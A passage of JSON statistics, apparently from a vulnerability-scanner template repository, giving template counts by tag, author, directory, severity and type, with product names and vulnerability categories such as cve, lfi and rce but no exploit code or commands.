unt":2},{"name":"enumeration","count":2},{"name":"odoo","count":2},{"name":"electron","count":2},{"name":"smb","count":2},{"name":"ucmdb","count":2},{"name":"vcenter","count":2},{"name":"grav","count":2},{"name":"bruteforce","count":2},{"name":"xxljob","count":2},{"name":"hostheader-injection","count":2},{"name":"qcubed","count":2},{"name":"hjtcloud","count":2},{"name":"lotus","count":2},{"name":"payara","count":2},{"name":"vrealize","count":2},{"name":"embed","count":2},{"name":"hpe","count":2},{"name":"plesk","count":2},{"name":"status","count":2},{"name":"huawei","count":2},{"name":"getsimple","count":2},{"name":"mailchimp","count":2},{"name":"aspose","count":2},{"name":"akkadian","count":2},{"name":"justwriting","count":2},{"name":"fortios","count":2},{"name":"igs","count":2},{"name":"rancher","count":2},{"name":"totemomail","count":2},{"name":"geowebserver","count":2},{"name":"cve2005","count":2},{"name":"sitecore","count":2},{"name":"mcafee","count":2},{"name":"nextjs","count":2},{"name":"backups","count":2},{"name":"chamilo","count":2},{"name":"prestashop","count":2},{"name":"icewarp","count":2},{"name":"flir","count":2},{"name":"bitly","count":2},{"name":"qihang","count":2},{"name":"trixbox","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"avantfax","count":2},{"name":"ec2","count":2},{"name":"hashicorp","count":2},{"name":"aruba","count":2},{"name":"splunk","count":2},{"name":"showdoc","count":2},{"name":"bypass","count":2},{"name":"paloalto","count":2},{"name":"netis","count":2},{"name":"natshell","count":2},{"name":"glassfish","count":2},{"name":"guacamole","count":2},{"name":"sharepoint","count":2},{"name":"cache","count":2},{"name":"heroku","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"netsweeper","count":2},{"name":"adminer","count":2},{"name":"chiyu","count":2},{"name":"axis2","count":2},{"name":"sonarqube","count":2},{"name":"kong","count":2},{"name":"emerge","count":2},{"name":"tidb","count":2},{"name":"upload","count":2},{"name":"oauth","count":2},{"name":"db","count":2},{"name":"favicon","count":2},{"name":"liferay","count":2},{"name":"saltstack","count":2},{"name":"chyrp","count":2},{"name":"middleware","count":2},{"name":"frp","count":2},{"name":"prtg","count":2},{"name":"rockmongo","count":2},{"name":"yapi","count":2},{"name":"storage","count":2},{"name":"idrac","count":2},{"name":"monitorix","count":1},{"name":"moinmoin","count":1},{"name":"maccmsv10","count":1},{"name":"sgp","count":1},{"name":"buttercms","count":1},{"name":"twitter","count":1},{"name":"ghost","count":1},{"name":"monitorr","count":1},{"name":"burp","count":1},{"name":"viewlinc","count":1},{"name":"webmodule-ee","count":1},{"name":"scs","count":1},{"name":"accela","count":1},{"name":"labtech","count":1},{"name":"tracer","count":1},{"name":"crm","count":1},{"name":"zookeeper","count":1},{"name":"asus","count":1},{"name":"woocomernce","count":1},{"name":"zeroshell","count":1},{"name":"nifi","count":1},{"name":"influxdb","count":1},{"name":"upnp","count":1},{"name":"zarafa","count":1},{"name":"zend","count":1},{"name":"instagram","count":1},{"name":"robomongo","count":1},{"name":"yachtcontrol","count":1},{"name":"sophos","count":1},{"name":"qdpm","count":1},{"name":"emby","count":1},{"name":"huijietong","count":1},{"name":"springframework","count":1},{"name":"xml","count":1},{"name":"route","count":1},{"name":"fcm","count":1},{"name":"ricoh","count":1},{"name":"adiscon","count":1},{"name":"mantisbt","count":1},{"name":"cyberoam","count":1},{"name":"ipstack","count":1},{"name":"myucms","count":1},{"name":"emc","count":1},{"name":"ambari","count":1},{"name":"octobercms","count":1},{"name":"tjws","count":1},{"name":"contentkeeper","count":1},{"name":"spring","count":1},{"name":"servicenow","count":1},{"name":"expn","count":1},{"name":"opentsdb","count":1},{"name":"mongo","count":1},{"name":"linkedin","count":1},{"name":"totaljs","count":1},{"name":"olivetti","count":1},{"name":"basic-auth","count":1},{"name":"tenda","count":1},{"name":"tcexam","count":1},{"name":"xunchi","count":1},{"name":"erp-nc","count":1},{"name":"powercreator","count":1},{"name":"esmtp","count":1},{"name":"mantis","count":1},{"name":"servicedesk","count":1},{"name":"nps","count":1},{"name":"phalcon","count":1},{"name":"lutron","count":1},{"name":"jenzabar","count":1},{"name":"javascript","count":1},{"name":"listserv","count":1},{"name":"sarg","count":1},{"name":"avtech","count":1},{"name":"blackboard","count":1},{"name":"mapbox","count":1},{"name":"bolt","count":1},{"name":"exponentcms","count":1},{"name":"skycaiji","count":1},{"name":"bazarr","count":1},{"name":"database","count":1},{"name":"jsp","count":1},{"name":"nedi","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"etouch","count":1},{"name":"opm","count":1},{"name":"landray","count":1},{"name":"circle","count":1},{"name":"traefik","count":1},{"name":"clickhouse","count":1},{"name":"tectuus","count":1},{"name":"razor","count":1},{"name":"jenkin","count":1},{"name":"74cms","count":1},{"name":"argussurveillance","count":1},{"name":"minimouse","count":1},{"name":"realteo","count":1},{"name":"pihole","count":1},{"name":"nerdgraph","count":1},{"name":"nearby","count":1},{"name":"beanshell","count":1},{"name":"synnefo","count":1},{"name":"concrete","count":1},{"name":"rubedo","count":1},{"name":"bullwark","count":1},{"name":"openweather","count":1},{"name":"webui","count":1},{"name":"javafaces","count":1},{"name":"mediumish","count":1},{"name":"clockwork","count":1},{"name":"mirai","count":1},{"name":"cherokee","count":1},{"name":"rockethchat","count":1},{"name":"weglot","count":1},{"name":"memcached","count":1},{"name":"elfinder","count":1},{"name":"autocomplete","count":1},{"name":"smi","count":1},{"name":"jfrog","count":1},{"name":"oidc","count":1},{"name":"pagerduty","count":1},{"name":"avalanche","count":1},{"name":"uwsgi","count":1},{"name":"buildkite","count":1},{"name":"biometrics","count":1},{"name":"gloo","count":1},{"name":"tinypng","count":1},{"name":"jaspersoft","count":1},{"name":"qsan","count":1},{"name":"centreon","count":1},{"name":"expose","count":1},{"name":"sceditor","count":1},{"name":"ems","count":1},{"name":"jnoj","count":1},{"name":"weather","count":1},{"name":"plugin","count":1},{"name":"xmlchart","count":1},{"name":"opensmtpd","count":1},{"name":"xiuno","count":1},{"name":"wamp","count":1},{"name":"miscrsoft","count":1},{"name":"seacms","count":1},{"name":"bookstack","count":1},{"name":"ganglia","count":1},{"name":"domxss","count":1},{"name":"hadoop","count":1},{"name":"mdb","count":1},{"name":"spip","count":1},{"name":"blind","count":1},{"name":"geutebruck","count":1},{"name":"wavemaker","count":1},{"name":"loqate","count":1},{"name":"achecker","count":1},{"name":"phpfusion","count":1},{"name":"zzzcms","count":1},{"name":"bingmaps","count":1},{"name":"wildfly","count":1},{"name":"ns","count":1},{"name":"photo","count":1},{"name":"hortonworks","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"kubeflow","count":1},{"name":"apiman","count":1},{"name":"secmail","count":1},{"name":"discourse","count":1},{"name":"elascticsearch","count":1},{"name":"werkzeug","count":1},{"name":"pyramid","count":1},{"name":"addpac","count":1},{"name":"iceflow","count":1},{"name":"roads","count":1},{"name":"dnssec","count":1},{"name":"tika","count":1},{"name":"jeewms","count":1},{"name":"phpshowtime","count":1},{"name":"streetview","count":1},{"name":"stripe","count":1},{"name":"froxlor","count":1},{"name":"sqlite","count":1},{"name":"tugboat","count":1},{"name":"playable","count":1},{"name":"websphere","count":1},{"name":"mod-proxy","count":1},{"name":"directions","count":1},{"name":"jquery","count":1},{"name":"klog","count":1},{"name":"gespage","count":1},{"name":"javamelody","count":1},{"name":"chinaunicom","count":1},{"name":"circontrorl","count":1},{"name":"zcms","count":1},{"name":"shiro","count":1},{"name":"kafdrop","count":1},{"name":"phpfastcache","count":1},{"name":"ewebs","count":1},{"name":"craftcms","count":1},{"name":"cockpit","count":1},{"name":"whm","count":1},{"name":"flexbe","count":1},{"name":"parentlink","count":1},{"name":"elasticsearch","count":1},{"name":"geocode","count":1},{"name":"elevation","count":1},{"name":"cobub","count":1},{"name":"wakatime","count":1},{"name":"artica","count":1},{"name":"xmpp","count":1},{"name":"couchbase","count":1},{"name":"checkpoint","count":1},{"name":"xvr","count":1},{"name":"openx","count":1},{"name":"rsyncd","count":1},{"name":"phpunit","count":1},{"name":"wmt","count":1},{"name":"appweb","count":1},{"name":"zm","count":1},{"name":"cloudinary","count":1},{"name":"b2evolution","count":1},{"name":"luftguitar","count":1},{"name":"sar2html","count":1},{"name":"clusterengine","count":1},{"name":"turbocrm","count":1},{"name":"fortigates","count":1},{"name":"triconsole","count":1},{"name":"sprintful","count":1},{"name":"ecom","count":1},{"name":"redwood","count":1},{"name":"eyelock","count":1},{"name":"tor","count":1},{"name":"visualstudio","count":1},{"name":"idemia","count":1},{"name":"perl","count":1},{"name":"fiori","count":1},{"name":"clave","count":1},{"name":"ulterius","count":1},{"name":"placeos","count":1},{"name":"mara","count":1},{"name":"gitlist","count":1},{"name":"cocoon","count":1},{"name":"bedita","count":1},{"name":"bing","count":1},{"name":"interlib","count":1},{"name":"dom","count":1},{"name":"ognl","count":1},{"name":"kindeditor","count":1},{"name":"beanstalk","count":1},{"name":"dbeaver","count":1},{"name":"glowroot","count":1},{"name":"weiphp","count":1},{"name":"details","count":1},{"name":"krweb","count":1},{"name":"travis","count":1},{"name":"asana","count":1},{"name":"owa","count":1},{"name":"gridx","count":1},{"name":"testrail","count":1},{"name":"alerta","count":1},{"name":"redcap","count":1},{"name":"panabit","count":1},{"name":"netrc","count":1},{"name":"feifeicms","count":1},{"name":"clockwatch","count":1},{"name":"wondercms","count":1},{"name":"opensns","count":1},{"name":"starttls","count":1},{"name":"dotnet","count":1},{"name":"mkdocs","count":1},{"name":"rabbitmq","count":1},{"name":"myvuehelp","count":1},{"name":"sql","count":1},{"name":"iterable","count":1},{"name":"newrelic","count":1},{"name":"plastic","count":1},{"name":"diris","count":1},{"name":"square","count":1},{"name":"acexy","count":1},{"name":"k8","count":1},{"name":"salesforce","count":1},{"name":"find","count":1},{"name":"alibaba","count":1},{"name":"shoppable","count":1},{"name":"ruckus","count":1},{"name":"cgi","count":1},{"name":"lokalise","count":1},{"name":"imap","count":1},{"name":"webftp","count":1},{"name":"dvr","count":1},{"name":"shopware","count":1},{"name":"ssltls","count":1},{"name":"dotclear","count":1},{"name":"axiom","count":1},{"name":"bash","count":1},{"name":"novnc","count":1},{"name":"manager","count":1},{"name":"nsasg","count":1},{"name":"raspap","count":1},{"name":"sourcebans","count":1},{"name":"blue-ocean","count":1},{"name":"flink","count":1},{"name":"nc2","count":1},{"name":"glances","count":1},{"name":"htmli","count":1},{"name":"svnserve","count":1},{"name":"cloudflare","count":1},{"name":"auth","count":1},{"name":"eg","count":1},{"name":"k8s","count":1},{"name":"tamronos","count":1},{"name":"solman","count":1},{"name":"netmask","count":1},{"name":"primetek","count":1},{"name":"cves2001","count":1},{"name":"pgadmin","count":1},{"name":"simplecrm","count":1},{"name":"vsphere","count":1},{"name":"speed","count":1},{"name":"redis","count":1},{"name":"adb","count":1},{"name":"twitter-server","count":1},{"name":"socomec","count":1},{"name":"pacsone","count":1},{"name":"oscommerce","count":1},{"name":"gilacms","count":1},{"name":"shoretel","count":1},{"name":"visualtools","count":1},{"name":"gstorage","count":1},{"name":"rdp","count":1},{"name":"mongoshake","count":1},{"name":"jitsi","count":1},{"name":"ntopng","count":1},{"name":"pcoip","count":1},{"name":"openerp","count":1},{"name":"ueditor","count":1},{"name":"terraform","count":1},{"name":"nette","count":1},{"name":"magicflow","count":1},{"name":"lg-nas","count":1},{"name":"karel","count":1},{"name":"shopxo","count":1},{"name":"wavlink","count":1},{"name":"xampp","count":1},{"name":"wiki","count":1},{"name":"clink-office","count":1},{"name":"opencast","count":1},{"name":"gotmls","count":1},{"name":"rmi","count":1},{"name":"nuxeo","count":1},{"name":"keenetic","count":1},{"name":"commscope","count":1},{"name":"anchorcms","count":1},{"name":"calendarix","count":1},{"name":"floc","count":1},{"name":"sidekiq","count":1},{"name":"shopizer","count":1},{"name":"grails","count":1},{"name":"meraki","count":1},{"name":"syslog","count":1},{"name":"sco","count":1},{"name":"dotnetnuke","count":1},{"name":"resourcespace","count":1},{"name":"vnc","count":1},{"name":"sangfor","count":1},{"name":"majordomo2","count":1},{"name":"cors","count":1},{"name":"setup","count":1},{"name":"metabase","count":1},{"name":"proftpd","count":1},{"name":"trilithic","count":1},{"name":"email","count":1},{"name":"key","count":1},{"name":"cscart","count":1},{"name":"default","count":1},{"name":"sureline","count":1},{"name":"aura","count":1},{"name":"tpshop","count":1},{"name":"centos","count":1},{"name":"mailgun","count":1},{"name":"visionhub","count":1},{"name":"openstack","count":1},{"name":"faraday","count":1},{"name":"cerebro","count":1},{"name":"pendo","count":1},{"name":"chevereto","count":1},{"name":"rujjie","count":1},{"name":"zmanda","count":1},{"name":"tieline","count":1},{"name":"smartblog","count":1},{"name":"remkon","count":1},{"name":"csrfguard","count":1},{"name":"subrion","count":1},{"name":"woocommerce","count":1},{"name":"discord","count":1},{"name":"vsftpd","count":1},{"name":"optiLink","count":1},{"name":"jabber","count":1},{"name":"graphql","count":1},{"name":"tapestry","count":1},{"name":"spf","count":1},{"name":"fastapi","count":1},{"name":"hiawatha","count":1},{"name":"stem","count":1},{"name":"zyxel","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"loganalyzer","count":1},{"name":"duomicms","count":1},{"name":"empirecms","count":1},{"name":"redmine","count":1},{"name":"finereport","count":1},{"name":"sage","count":1},{"name":"wifisky","count":1},{"name":"nomad","count":1},{"name":"circontrol","count":1},{"name":"szhe","count":1},{"name":"tongda","count":1},{"name":"gsoap","count":1},{"name":"fuelcms","count":1},{"name":"spidercontrol","count":1},{"name":"phpinfo","count":1},{"name":"frontpage","count":1},{"name":"camunda","count":1},{"name":"mobileiron","count":1},{"name":"api-manager","count":1},{"name":"matrix","count":1},{"name":"wing-ftp","count":1},{"name":"place","count":1},{"name":"selea","count":1},{"name":"wazuh","count":1},{"name":"mpsec","count":1},{"name":"youtube","count":1},{"name":"actuator","count":1},{"name":"cloudron","count":1},{"name":"lotuscms","count":1},{"name":"mrtg","count":1},{"name":"package","count":1},{"name":"sonarcloud","count":1},{"name":"oneblog","count":1},{"name":"graylog","count":1},{"name":"h3c-imc","count":1},{"name":"qvisdvr","count":1},{"name":"websvn","count":1},{"name":"svn","count":1},{"name":"zte","count":1},{"name":"geolocation","count":1},{"name":"solarlog","count":1},{"name":"expressjs","count":1},{"name":"thinkadmin","count":1},{"name":"apos","count":1},{"name":"rocketchat","count":1},{"name":"livezilla","count":1},{"name":"timezone","count":1},{"name":"tensorboard","count":1},{"name":"zenario","count":1},{"name":"csod","count":1},{"name":"messaging","count":1},{"name":"haproxy","count":1},{"name":"motorola","count":1},{"name":"acontent","count":1},{"name":"arl","count":1},{"name":"octoprint","count":1},{"name":"digitalocean","count":1},{"name":"hubspot","count":1},{"name":"circleci","count":1},{"name":"sentry","count":1},{"name":"fortinet","count":1},{"name":"webmin","count":1},{"name":"episerver","count":1},{"name":"spotify","count":1},{"name":"locations","count":1},{"name":"redhat","count":1},{"name":"comodo","count":1},{"name":"timeclock","count":1},{"name":"mysql","count":1},{"name":"fedora","count":1},{"name":"linksys","count":1},{"name":"acme","count":1},{"name":"gunicorn","count":1},{"name":"codeigniter","count":1},{"name":"pagespeed","count":1},{"name":"cse","count":1},{"name":"nexusdb","count":1},{"name":"varnish","count":1},{"name":"eprints","count":1},{"name":"iptime","count":1},{"name":"okta","count":1},{"name":"postmark","count":1},{"name":"owasp","count":1},{"name":"fortilogger","count":1},{"name":"jumpcloud","count":1},{"name":"postmessage","count":1},{"name":"dahua","count":1},{"name":"phpwiki","count":1},{"name":"gitea","count":1},{"name":"metinfo","count":1},{"name":"darkstat","count":1},{"name":"rhymix","count":1},{"name":"pippoint","count":1},{"name":"jmx","count":1},{"name":"fortiweb","count":1},{"name":"cofax","count":1},{"name":" default-login","count":1},{"name":"st","count":1},{"name":"yzmcms","count":1},{"name":"scimono","count":1},{"name":"okiko","count":1},{"name":"graphite","count":1},{"name":"vscode","count":1},{"name":"plone","count":1},{"name":"processmaker","count":1},{"name":"logontracer","count":1},{"name":"nuuo","count":1},{"name":"mautic","count":1},{"name":"moin","count":1},{"name":"aspnuke","count":1},{"name":"limit","count":1},{"name":"trane","count":1},{"name":"webadmin","count":1},{"name":"pmb","count":1},{"name":"postgres","count":1},{"name":"lighttpd","count":1},{"name":"kerbynet","count":1},{"name":"openrestry","count":1},{"name":"dompdf","count":1},{"name":"natemail","count":1},{"name":"timesheet","count":1},{"name":"maxsite","count":1},{"name":"tensorflow","count":1},{"name":"zms","count":1},{"name":"omi","count":1},{"name":"saltapi","count":1},{"name":"graph","count":1},{"name":"rmc","count":1},{"name":"gogs","count":1},{"name":"dropbox","count":1},{"name":"office365","count":1},{"name":"soar","count":1},{"name":"pivotaltracker","count":1},{"name":"hiboss","count":1},{"name":"landrayoa","count":1},{"name":"pulsesecure","count":1},{"name":"node-red-dashboard","count":1},{"name":"deviantart","count":1},{"name":"ioncube","count":1},{"name":"ruby","count":1},{"name":"swagger","count":1},{"name":"azkaban","count":1},{"name":"bigbluebutton","count":1},{"name":"skywalking","count":1},{"name":"announcekit","count":1},{"name":"mariadb","count":1},{"name":"netdata","count":1},{"name":"gurock","count":1},{"name":"netgenie","count":1},{"name":"panasonic","count":1},{"name":"portainer","count":1},{"name":"openemr","count":1},{"name":"goahead","count":1},{"name":"cve2006","count":1},{"name":"daybyday","count":1},{"name":"nordex","count":1},{"name":"etherpad","count":1},{"name":"exacqvision","count":1},{"name":"drone","count":1},{"name":"tileserver","count":1},{"name":"nimble","count":1},{"name":"yealink","count":1},{"name":"ilo4","count":1},{"name":"xdcms","count":1},{"name":"fastcgi","count":1},{"name":"kyan","count":1},{"name":"alertmanager","count":1},{"name":"wooyun","count":1},{"name":"geddy","count":1},{"name":"spectracom","count":1},{"name":"smartsense","count":1},{"name":"fortigate","count":1},{"name":"gateone","count":1},{"name":"cve202","count":1},{"name":"vidyo","count":1},{"name":"lancom","count":1},{"name":"nweb2fax","count":1},{"name":"extractor","count":1},{"name":"embedthis","count":1},{"name":"plc","count":1},{"name":"calendly","count":1},{"name":"ssl","count":1},{"name":"panos","count":1},{"name":"eyou","count":1},{"name":"lanproxy","count":1},{"name":"viewpoint","count":1}],"authors":[{"name":"dhiyaneshdk","count":296},{"name":"daffainfo","count":289},{"name":"pikpikcu","count":281},{"name":"pdteam","count":201},{"name":"geeknik","count":166},{"name":"dwisiswant0","count":131},{"name":"gy741","count":83},{"name":"pussycat0x","count":74},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":55},{"name":"gaurang","count":42},{"name":"philippedelteil","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"hackergautam","count":9},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"kophjager007","count":7},{"name":"oppsec","count":7},{"name":"harshbothra_","count":7},{"name":"dogasantos","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"divya_mudgal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"tess","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"emenalf","count":3},{"name":"jarijaas","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"skeltavik","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"sullo","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"unstabl3","count":3},{"name":"sushantkamble","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"thomas_from_offensity","count":3},{"name":"johnjhacking","count":3},{"name":"kiblyn11","count":2},{"name":"g4l1t0","count":2},{"name":"manas_harsh","count":2},{"name":"amsda","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"whoever","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"lotusdll","count":2},{"name":"0xsapra","count":2},{"name":"hahwul","count":2},{"name":"udit_thakkur","count":2},{"name":"randomrobbie","count":2},{"name":"0xsmiley","count":2},{"name":"0xprial","count":2},{"name":"fabaff","count":2},{"name":"afaq","count":2},{"name":"joeldeleep","count":2},{"name":"random-robbie","count":2},{"name":"cocxanh","count":2},{"name":"nkxxkn","count":2},{"name":"davidmckennirey","count":2},{"name":"ree4pwn","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"socketz","count":2},{"name":"r3naissance","count":2},{"name":"alifathi-h1","count":2},{"name":"convisoappsec","count":2},{"name":"bp0lr","count":2},{"name":"foulenzer","count":2},{"name":"moritz nentwig","count":2},{"name":"swissky","count":2},{"name":"w4cky_","count":2},{"name":"arcc","count":2},{"name":"bsysop","count":2},{"name":"zomsop82","count":2},{"name":"huowuzhao","count":2},{"name":"r12w4n","count":2},{"name":"parth","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"x1m_martijn","count":2},{"name":"vavkamil","count":2},{"name":"0xcrypto","count":2},{"name":"gal nagli","count":2},{"name":"0xrudra","count":2},{"name":"bing0o","count":2},{"name":"ehsahil","count":2},{"name":"gevakun","count":2},{"name":"sy3omda","count":2},{"name":"mah3sec_","count":1},{"name":"ahmetpergamum","count":1},{"name":"push4d","count":1},{"name":"taielab","count":1},{"name":"mubassirpatel","count":1},{"name":"qlkwej","count":1},{"name":"forgedhallpass","count":1},{"name":"shelld3v","count":1},{"name":"0xrod","count":1},{"name":"hanlaomo","count":1},{"name":"s1r1u5_","count":1},{"name":"tim_koopmans","count":1},{"name":"toufik airane","count":1},{"name":"elmahdi","count":1},{"name":"bolli95","count":1},{"name":"ipanda","count":1},{"name":"bjhulst","count":1},{"name":"_darrenmartyn","count":1},{"name":"jrolf","count":1},{"name":"flag007","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"thevillagehacker","count":1},{"name":"clarkvoss","count":1},{"name":"intx0x80","count":1},{"name":"ooooooo_q","count":1},{"name":"becivells","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"omarkurt","count":1},{"name":"akash.c","count":1},{"name":"th3.d1p4k","count":1},{"name":"fmunozs","count":1},{"name":"x6263","count":1},{"name":"yavolo","count":1},{"name":"micha3lb3n","count":1},{"name":"retr0","count":1},{"name":"aresx","count":1},{"name":"igibanez","count":1},{"name":"ringo","count":1},{"name":"ilovebinbash","count":1},{"name":"kareemse1im","count":1},{"name":"lethargynavigator","count":1},{"name":"b0yd","count":1},{"name":"daviey","count":1},{"name":"0xtavian","count":1},{"name":"pudsec","count":1},{"name":"smaranchand","count":1},{"name":"j33n1k4","count":1},{"name":"brabbit10","count":1},{"name":"ohlinge","count":1},{"name":"alph4byt3","count":1},{"name":"jeya seelan","count":1},{"name":"exploitation","count":1},{"name":"petruknisme","count":1},{"name":"soyelmago","count":1},{"name":"sbani","count":1},{"name":"defr0ggy","count":1},{"name":"lark lab","count":1},{"name":"elouhi","count":1},{"name":"sicksec","count":1},{"name":"apt-mirror","count":1},{"name":"remonsec","count":1},{"name":"blckraven","count":1},{"name":"revblock","count":1},{"name":"philippdelteil","count":1},{"name":"patralos","count":1},{"name":"schniggie","count":1},{"name":"jteles","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"droberson","count":1},{"name":"_c0wb0y_","count":1},{"name":"un-fmunozs","count":1},{"name":"thebinitghimire","count":1},{"name":"infosecsanyam","count":1},{"name":"naglinagli","count":1},{"name":"udyz","count":1},{"name":"deena","count":1},{"name":"nytr0gen","count":1},{"name":"b4uh0lz","count":1},{"name":"gboddin","count":1},{"name":"its0x08","count":1},{"name":"andysvints","count":1},{"name":"zhenwarx","count":1},{"name":"thezakman","count":1},{"name":"shreyapohekar","count":1},{"name":"sshell","count":1},{"name":"mass0ma","count":1},{"name":"streetofhackerr007","count":1},{"name":"mhdsamx","count":1},{"name":"@dwisiswant0","count":1},{"name":"florianmaak","count":1},{"name":"dahse89","count":1},{"name":"iampritam","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"notsoevilweasel","count":1},{"name":"tirtha_mandal","count":1},{"name":"elder tao","count":1},{"name":"xstp","count":1},{"name":"juicypotato1","count":1},{"name":"retr02332","count":1},{"name":"whynotke","count":1},{"name":"rojanrijal","count":1},{"name":"pdp","count":1},{"name":"ahmed sherif","count":1},{"name":"c3l3si4n","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akshansh","count":1},{"name":"@ofjaaah","count":1},{"name":"adrianmf","count":1},{"name":"_harleo","count":1},{"name":"noamrathaus","count":1},{"name":"d0rkerdevil","count":1},{"name":"andirrahmani1","count":1},{"name":"chron0x","count":1},{"name":"geraldino2","count":1},{"name":"sec_hawk","count":1},{"name":"fopina","count":1},{"name":"hakluke","count":1},{"name":"evolutionsec","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"kre80r","count":1},{"name":"shifacyclewla","count":1},{"name":"rotemreiss","count":1},{"name":"nerrorsec","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0xteles","count":1},{"name":"raesene","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"berkdusunur","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"bad5ect0r","count":1},{"name":"yashanand155","count":1},{"name":"cookiehanhoan","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"knassar702","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"vzamanillo","count":1},{"name":"co0nan","count":1},{"name":"wabafet","count":1},{"name":"izn0u","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ajaysenr","count":1},{"name":"kurohost","count":1},{"name":"absshax","count":1},{"name":"0h1in9e","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ldionmarcil","count":1},{"name":"oscarintherocks","count":1},{"name":"52971","count":1},{"name":"regala_","count":1},{"name":"dawid-czarnecki","count":1},{"name":"zandros0","count":1},{"name":"b0rn2r00t","count":1},{"name":"kabirsuda","count":1},{"name":"makyotox","count":1},{"name":"willd96","count":1},{"name":"undefl0w","count":1},{"name":"orpheus","count":1},{"name":"alperenkesk","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"alex","count":1},{"name":"furkansenan","count":1},{"name":"nvn1729","count":1},{"name":"pratik khalane","count":1},{"name":"sickwell","count":1},{"name":"affix","count":1},{"name":"0xd0ff9","count":1},{"name":"borna nematzadeh","count":1},{"name":"rodnt","count":1}],"directory":[{"name":"cves","count":842},{"name":"vulnerabilities","count":329},{"name":"exposed-panels","count":278},{"name":"technologies","count":202},{"name":"exposures","count":196},{"name":"misconfiguration","count":143},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"iot","count":36},{"name":"network","count":33},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":775},{"name":"high","count":651},{"name":"medium","count":478},{"name":"critical","count":297},{"name":"low","count":156}],"types":[{"name":"http","count":2244},{"name":"file","count":50},{"name":"network","count":46},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":843},{"name":"lfi","count":348},{"name":"panel","count":292},{"name":"wordpress","count":260},{"name":"xss","count":260},{"name":"exposure","count":248},{"name":"rce","count":218},{"name":"tech","count":197},{"name":"wp-plugin","count":180},{"name":"cve2020","count":166},{"name":"cve2021","count":160},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"config","count":99},{"name":"cve2019","count":98},{"name":"cve2018","count":92},{"name":"token-spray","count":83},{"name":"iot","count":80},{"name":"apache","count":74},{"name":"oast","count":71},{"name":"takeover","count":70},{"name":"default-login","count":68},{"name":"token","count":67},{"name":"cve2017","count":51},{"name":"file","count":51},{"name":"unauth","count":50},{"name":"network","count":44},{"name":"ssrf","count":42},{"name":"sqli","count":41},{"name":"cve2016","count":39},{"name":"","count":39},{"name":"redirect","count":38},{"name":"oracle","count":37},{"name":"google","count":30},{"name":"cve2015","count":30},{"name":"logs","count":30},{"name":"jira","count":29},{"name":"atlassian","count":29},{"name":"cisco","count":28},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"auth-bypass","count":25},{"name":"generic","count":24},{"name":"misconfig","c